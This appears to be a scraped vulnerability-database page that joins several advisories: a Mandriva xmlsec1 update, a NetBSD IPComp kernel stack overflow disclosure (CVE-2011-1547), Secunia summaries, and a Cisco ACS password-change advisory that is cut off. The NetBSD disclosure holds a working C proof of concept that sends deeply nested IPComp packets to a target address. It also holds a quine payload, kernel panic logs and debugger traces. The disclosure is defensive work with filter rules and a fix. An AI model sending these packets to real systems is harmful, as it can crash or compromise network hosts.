3409c185fdbcb57c45a1883752ade7c3 mes5/x86_64/lib64xmlsec1-nss1-1.2.10-7.3mdvmes5.2.x86_64.rpm f781e2d050e0c19945c783dc86745e08 mes5/x86_64/lib64xmlsec1-nss-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm cc9fc7fcd1d32d4877689486e424875e mes5/x86_64/lib64xmlsec1-openssl1-1.2.10-7.3mdvmes5.2.x86_64.rpm a5315ce478dda5fd0af55a1acf043288 mes5/x86_64/lib64xmlsec1-openssl-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 1a153d8d6af32724260f029205cd0a54 mes5/x86_64/xmlsec1-1.2.10-7.3mdvmes5.2.x86_64.rpm d07141a9abde87df9f330093acd2d59f mes5/SRPMS/xmlsec1-1.2.10-7.3mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFNmXaUmqjQ0CJFipgRAgs3AKCLIc162L+edW3LKFOx7G/U4GkynwCgpJ7j SEMdD/0Sj9XbDDepzFsOW3o= =Kuyv -----END PGP SIGNATURE-----

Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers. plural IPComp A memory corruption vulnerability exists in the receive processing of the implementation. IPComp (RFC 3173) Generally IPsec Used with the implementation of KAME Projects and NetBSD In projects, etc. IPComp and IPsec The code that implements the crafted IPComp A stack-based buffer overflow can occur when processing the payload. Attack code using this vulnerability has been released.Service disruption by a remote third party (DoS) An attacker may be able to attack or execute arbitrary code. NetBSD is prone to a remote memory-corruption vulnerability because it fails to adequately check for stack overflows in nested IP Payload Compression protocol (IPComp) payloads. Attackers can exploit this issue to trigger a kernel stack overflow, resulting in the execution of arbitrary code with superuser privileges. Failed attacks may cause a denial-of-service condition. A successful exploit will completely compromise affected computers. This issue may affect systems derived from NetBSD IPComp implementations. BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload ------------------------------------------------------------------------------- Gruezi, this document describes CVE-2011-1547. RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so). An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below. struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved uint16_t comp_cpi; // Compression Parameter Index }; The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only 1 algorithm is widely implemented, RFC1951 DEFLATE (cpi=2). It's well documented that ipcomp can be used to traverse perimeter filtering, however this document discusses potential implementation flaws observed in popular stacks. The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so: algo = ipcomp_algorithm_lookup(cpi); /* ... */ error = (*algo->decompress)(m, m->m_next, &newlen); /* ... */ if (nxt != IPPROTO_DONE) { if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 && ipsec4_in_reject(m, NULL)) { IPSEC_STATINC(IPSEC_STAT_IN_POLVIO); goto fail; } (*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt); } else m_freem(m); /* ... */ Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload. The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler. The NetBSD/KAME network stack is used as basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions). The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher. The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader. -------------------- Affected Software ------------------------ Any NetBSD derived IPComp/IPSec stack may be vulnerable (Xnu, FTOS, etc.). NetBSD is not distributed with IPSec support enabled by default, however Apple OSX and various other derivatives are. There are so many NetBSD derived network stacks that it is infeasible to check them all, concerned administrators are advised to check with their vendor if there is any doubt. Major vendors known to use network stacks derived from NetBSD were pre-notified about this vulnerability. If I missed you, it is either not well known that you use the BSD stack, you did not respond to security@ mail, or could not use pgp properly. Additionally, administrators of critical or major deployments of NetBSD (e.g. dns root servers) were given advance notice in order to deploy appropriate filter rules. Exploitability of kernel stack overflows will vary by platform (n.b. a stack overflow is not a stack buffer overflow, for a concise definition see TAOCP3,V1,S2.2.2). Also note that a kernel stack overflow is very different from a userland stack overflow. For further discussion, including attacks on other operating systems, see the notes section on ipcomp quines below. However, this is not a trivial task, and is highly platform dependent. I have verified kernel stack overflows on NetBSD are exploitable, I have looked at the source code for xnu and do not see any obvious obstacles to prevent exploitation (kernel stack segment limits, guard pages, etc. which would cause the worst impact to be limited to remote denial of service), so have no reason to believe it is different. Thoughts on this topic from fellow researchers would be welcome. Source code for a sample Linux program to reproduce this flaw on NetBSD is listed below. Please note, check if your system requires an IPv4 header in the compressed payload before attempting to adapt it to your needs. #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <arpa/inet.h> #include <unistd.h> #include <stdio.h> #include <zlib.h> #include <alloca.h> #include <stdbool.h> #include <stdlib.h> #include <string.h> // // BSD IPComp Kernel Stack Overflow Testcase // -- Tavis Ormandy <taviso@cmpxchg8b.com>, March 2011 // #define MAX_PACKET_SIZE (1024 * 1024 * 32) #define MAX_ENCAP_DEPTH 1024 enum { IPCOMP_OUI = 1, IPCOMP_DEFLATE = 2, IPCOMP_LZS = 3, IPCOMP_MAX, }; struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved, must be zero uint16_t comp_cpi; // Compression parameter index uint8_t comp_data[0]; // Payload. }; bool ipcomp_encapsulate_data(void *data, size_t size, int nxt, struct ipcomp **out, size_t *length, int level) { struct ipcomp *ipcomp; z_stream zstream; ipcomp = malloc(MAX_PACKET_SIZE); *out = ipcomp; ipcomp->comp_nxt = nxt; ipcomp->comp_cpi = htons(IPCOMP_DEFLATE); ipcomp->comp_flags = 0; // Compress packet payload. zstream.zalloc = Z_NULL; zstream.zfree = Z_NULL; zstream.opaque = Z_NULL; if (deflateInit2(&zstream, level, Z_DEFLATED, -12, MAX_MEM_LEVEL, Z_DEFAULT_STRATEGY) != Z_OK) { fprintf(stderr, "error: failed to initialize zlib library\n"); return false; } zstream.avail_in = size; zstream.next_in = data; zstream.avail_out = MAX_PACKET_SIZE - sizeof(struct ipcomp); zstream.next_out = ipcomp->comp_data; if (deflate(&zstream, Z_FINISH) != Z_STREAM_END) { fprintf(stderr, "error: deflate() failed to create compressed payload, %s\n", zstream.msg); return false; } if (deflateEnd(&zstream) != Z_OK) { fprintf(stderr, "error: deflateEnd() returned failure, %s\n", zstream.msg); return false; } // Calculate size. *length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out; ipcomp = realloc(ipcomp, *length); free(data); return true; } int main(int argc, char **argv) { int s; struct sockaddr_in sin = {0}; struct ipcomp *ipcomp = malloc(0); size_t length = 0; unsigned depth = 0; // Nest an ipcomp packet deeply without compression, this allows us to // create maximum redundancy. for (depth = 0; depth < MAX_ENCAP_DEPTH; depth++) { if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_NO_COMPRESSION) != true) { fprintf(stderr, "error: failed to encapsulate data\n"); return 1; } } // Create a final outer packet with best compression, which should now // compress well due to Z_NO_COMPRESSION used in inner payloads. if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_BEST_COMPRESSION) != true) { fprintf(stderr, "error: failed to encapsulate data\n"); return 1; } fprintf(stdout, "info: created %u nested ipcomp payload, %u bytes\n", depth, length); sin.sin_family = AF_INET; sin.sin_port = htons(0); sin.sin_addr.s_addr = inet_addr(argv[1]); if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_COMP)) < 0) { fprintf(stderr, "error: failed to create socket, %m\n"); return 1; } if (sendto(s, ipcomp, length, MSG_NOSIGNAL, (const struct sockaddr *)(&sin), sizeof(sin)) != length) { fprintf(stderr, "error: send() returned failure, %m\n"); return 1; } fprintf(stdout, "info: success, packet sent to %s\n", argv[1]); free(ipcomp); return 0; } Packets of the following form are generated. Internet Protocol, Src: 192.168.1.1, Dst: 192.168.1.2 Version: 4 Header length: 20 bytes Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00) 0000 01.. = Differentiated Services Codepoint: Unknown (0x01) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 205 Identification: 0xc733 (50995) Flags: 0x00 0.. = Reserved bit: Not Set .0. = Don't fragment: Not Set ..0 = More fragments: Not Set Fragment offset: 0 Time to live: 64 Protocol: IPComp (0x6c) Header checksum: 0x2e69 [correct] [Good: True] [Bad : False] Source: 192.168.1.1 Destination: 192.168.1.2 IP Payload Compression Next Header: IPComp (0x6c) IPComp Flags: 0x00 IPComp CPI: DEFLATE (0x0002) Data (181 bytes) Data: 73656158... [Length: 181] $ gcc ipcomp.c -lz -o ipcomp $ sudo ./ipcomp 192.168.1.2 info: created 1024 nested ipcomp payload, 2538 bytes info: success, packet sent to 192.168.1.2 Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0x1000, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c0633269 cs 8 eflags 10202 cr2 1335 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Begin traceback... Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c06e6c90 cs 8 eflags 10246 cr2 8 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting... Adjust depth as required. (gdb) bt #0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112 #1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #5 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #6 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 [ trimmed ] #148 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #149 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #150 0xc0162bbb in ip_input (m=0xc14e1300) at ../../../../netinet/ip_input.c:1059 #151 0xc0161b82 in ipintr () at ../../../../netinet/ip_input.c:476 #152 0xc05d6248 in softint_execute (si=0xca79e154, l=0xca7a7a00, s=4) at ../../../../kern/kern_softint.c:539 #153 0xc05d60e6 in softint_dispatch (pinned=0xca7a7500, s=4) at ../../../../kern/kern_softint.c:811 (gdb) info frame Stack level 0, frame at 0xcab9bf08: eip = 0xc01ebd5c in ipcomp4_input (../../../../netinet6/ipcomp_input.c:112); saved eip 0xc01ec302 called by frame at 0xcab9bfa8 source language c. Arglist at 0xcab9bf00, args: m=0xc14e1300 Locals at 0xcab9bf00, Previous frame's sp is 0xcab9bf08 Saved registers: ebx at 0xcab9bef8, ebp at 0xcab9bf00, esi at 0xcab9befc, eip at 0xcab9bf04 (gdb) info target Symbols from "netbsd.gdb". Remote serial target in gdb-specific protocol: Debugging a target over a serial line. Therefore, an oob sp will write attacker controlled data. (gdb) tb panic Temporary breakpoint 2, panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184 184 kpreempt_disable(); (gdb) bt #0 panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184 #1 0xc06f0919 in trap (frame=0xcac49f84) at ../../../../arch/i386/i386/trap.c:368 #2 0xc06f0566 in trap_tss (tss=0xc0cfe5ec, trapno=13, code=0) at ../../../../arch/i386/i386/trap.c:197 #3 0xc010cb1b in ?? () (gdb) frame 1 (gdb) info symbol frame->tf_eip etc. ------------------- Mitigation ----------------------- ******************************************************************************* * Please note, this document is intended for security professionals, network * * or systems administrators, and vendors of network equipment and software. * * End users need not be concerned. * ******************************************************************************* For numerous reasons, it is a good idea to filter IPComp at the perimeter if it is not expected. Even when implemented correctly, IPComp completely defeats the purpose of Delayed Compression in OpenSSH (see CAN-2005-2096 for an example of why you always want delayed compression). Additionally, the encapsulation means any attacks that require link-local access can simply be wrapped in ipcomp and are then routable (that is not good). Affected servers and devices can use packet filtering to prevent the vulnerable code from being exercised. On systems with ipfw, a rule based on the following ipfw/ipfw6 template can be used, adjust to whitelist expected peers as appropriate. # ipfw add deny proto ipcomp On other BSD systems, pfctl rules can be substituted. See vendor documentation for how to configure network appliances to deny IPComp at network boundaries. ------------------- Solution ----------------------- I would recommend vendors disallow nested encapulation of ipcomp payloads. The implementation of this fix will of course vary by product. By the time you read this advisory, a fix should have been committed to the NetBSD repository, downstream consumers of NetBSD code are advised to import the changes urgently. A draft patch from S.P.Zeidler of the NetBSD project is attached for reference. ------------------- Credit ----------------------- This bug was discovered by Tavis Ormandy. ------------------- Greetz ----------------------- Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, Asirap, Meder, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., djm, Brian C., djrbliss, jono, and all my other elite friends and colleagues. And of course, $1$kk1q85Xp$Id.gAcJOg7uelf36VQwJQ/. Additional thanks to Jan, Felix and Meder for their mad xnu skillz. Jan helps organize a security conference called #days held in Lucerne, Switzerland (a very picturesque Swiss city). The CFP is currently open, you should check it out at https://www.hashdays.ch/. ------------------- Notes ----------------------- An elegant method of reproducing this flaw would be using self-reproducing Lempel-Ziv programs, rsc describes the technique here: http://research.swtch.com/2010/03/zip-files-all-way-down.html This method would also be able to disrupt non-recursive implementations that do not prevent nested encapulation, such as modern FreeBSD and OpenBSD. An ipcomp quine is defined below in GNU C syntax below, and a testcase for Linux is attached to this mail. struct { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved, must be zero uint16_t comp_cpi; // Compression parameter index uint8_t comp_data[180]; // Payload } ipcomp = { .comp_nxt = IPPROTO_COMP, .comp_flags = 0, .comp_cpi = htons(IPCOMP_DEFLATE), .comp_data = { 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff, 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff } }; Note that modern FreeBSD and OpenBSD appear to drop incoming ipcomp packets if no TBD entries are known (see netstat -s -p ipcomp statistics, and the setkey documentation). You will have to allow for this while testing. Depending on implementation, You may also need to spoof the source address of a peer, see man 7 raw. Special thanks to rsc and Matthew Dempsky for hints and assistance. Something like this may be useful for testing: # setkey -c add 192.168.0.1 192.168.0.2 ipcomp 0002 -C deflate ^D - I would advise caution when sending malformed or pathological packets across critical infrastructure or the public internet, many embedded devices are based on BSD-derived code and may not handle the error gracefully. - Julien will be angry I didn't use scapy, sorry! I am a fan :-) - A bug in Xnu's custom allocator for zlib (deflate_alloc) causes zlib initialisation to fail if ~1k bytes is not available to MALLOC() with M_NOWAIT, even though M_WAITOK was intended, as described in the comments: /* * Avert your gaze, ugly hack follows! * We init here so our malloc can allocate using M_WAIT. * We don't want to allocate if ipcomp isn't used, and we * don't want to allocate on the input or output path. * Allocation fails if we use M_NOWAIT because init allocates * something like 256k (ouch). */ However with some creativity it is possible to make the allocation succeed. You can observe this bug by sending an ipcomp packet and looking for the memory allocation failure in the network statistics (try something like `netstat -s | grep -A16 ipsec:`). You can also set `sysctl -w net.inet.ipsec.debug=1`. ------------------- References ----------------------- - http://research.swtch.com/2010/03/zip-files-all-way-down.html research!rsc: Zip Files All The Way Down - http://tools.ietf.org/html/rfc3173 RFC3173: IP Payload Compression Protocol (IPComp) - http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36&content-type=text/x-cvsweb-markup&only_with_tag=MAIN NetBSD: ipcomp_input.c, v1.36 - http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c Xnu: ipcomp_input.c - http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/ipfw.8.html ipfw -- IP firewall and traffic shaper control program - http://www.netbsd.org/docs/network/pf.html The NetBSD Packet Filter (generally applies to other popular BSDs). - http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=FREEBSD64#L222 Earlier versions of FreeBSD were implemented recursively, the code was since refactored. - http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=FREEBSD81#L299 The current version is implemented iteratively (see NOTES section on Quine DoS). - http://www.force10networks.com/products/ftos.asp FTOS - Force10 Operating System - http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html QNX Network Drivers Documentation Support high-quality journalism in information security by subscribing to LWN http://lwn.net/ (i have no connection to lwn other than appreciating their work). I have a twitter account where I occasionally comment on security topics. http://twitter.com/taviso ex$$ -- ------------------------------------- taviso@cmpxchg8b.com | pgp encrypted mail preferred ------------------------------------------------------- . ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: NetBSD IPComp Payload Decompression Stack Overflow Vulnerability SECUNIA ADVISORY ID: SA43969 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43969/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43969 RELEASE DATE: 2011-04-01 DISCUSS ADVISORY: http://secunia.com/advisories/43969/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43969/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43969 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Tavis Ormandy has reported a vulnerability in NetBSD, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. SOLUTION: Fixed in the CVS repository. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: Tavis Ormandy ORIGINAL ADVISORY: http://www.openwall.com/lists/oss-security/2011/04/01/1 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The web-based management interface in Cisco Secure Access Control System (ACS) 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3 allows remote attackers to change arbitrary user passwords via unspecified vectors, aka Bug ID CSCtl77440. The problem is Bug ID CSCtl77440 It is a problem.A third party may change the password of any user. This vulnerability cannot be used to change the type of user account: (1) An account defined on an external identity store such as a Lightweight Directory Access Protocol (LDAP) server, Microsoft Active Directory Server, RSA SecureID server, or external RADIUS server. This issue is being tracked by Cisco Bug ID CSCtl77440. An attacker can exploit this issue to change a user's password, thereby aiding in further attacks. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: Cisco Secure Access Control System Password Change Vulnerability SECUNIA ADVISORY ID: SA43924 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43924/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43924 RELEASE DATE: 2011-03-31 DISCUSS ADVISORY: http://secunia.com/advisories/43924/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43924/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43924 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cisco Secure Access Control System, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Apply patches. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: cisco-sa-20110330-acs: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Successful exploitation requires the user account to be defined on the internal identity store. Cisco has released free software updates that address this vulnerability. There is no workaround for this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml. Affected Products ================= Vulnerable Products +------------------ The following Cisco Secure ACS versions are affected by this vulnerability: * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any combination of these patches) installed and without patch 6 or later installed * Cisco Secure ACS version 5.2 without any patches installed * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these patches) installed and without patch 3 or later installed The previous list applies to both the hardware appliance and the software-only versions of the product. The following methods can be used to determine which version of the Cisco Secure ACS is installed: * From the Cisco Secure ACS command-line interface (CLI), issue the "show version" command, as shown in the following example: acs51a/admin# show version Cisco Application Deployment Engine OS Release: 1.2 ADE-OS Build Version: 1.2.0.152 ADE-OS System Architecture: i386 Copyright (c) 2005-2009 by Cisco Systems, Inc. All rights reserved. Hostname: acs51a Version information of installed applications --------------------------------------------- Cisco ACS VERSION INFORMATION ----------------------------- Version : 5.1.0.44.6 Internal Build ID : B.2347 Patches : 5-1-0-44-3 5-1-0-44-6 acs51a/admin# * On the main login page of the Cisco Secure ACS web-based interface, the version information is displayed on the left side of the screen. The presence of an additional digit after the version number indicates the highest patch level installed. The absence of any additional digit after the version string indicates a Cisco Secure ACS version with no patches installed. No other Cisco products are currently known to be affected by this vulnerability. Successful exploitation requires the user account to be defined on the internal identity store. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtl77440 ("Able to arbitrarily change user account passwords") CVSS Base Score - 5.0 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - Partial Availability Impact - None CVSS Temporal Score - 4.4 Exploitability - High Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of this vulnerability could allow an attacker to change the password of any user account that is defined on the internal identity store. Because the user would not know the new password, the attacker could also prevent a user from authenticating. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Customers can implement the UCP functionality through either a web-based front-end application or a scripting interface. Because this access would allow exploitation of the vulnerability described in this advisory, both of the following recommendations apply: * Stop providing UCP services * Do not include any computer that offers UCP services (either web-based or scripted) in the set of management stations that are allowed to access the ACS server Obtaining Fixed Software ======================== Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- 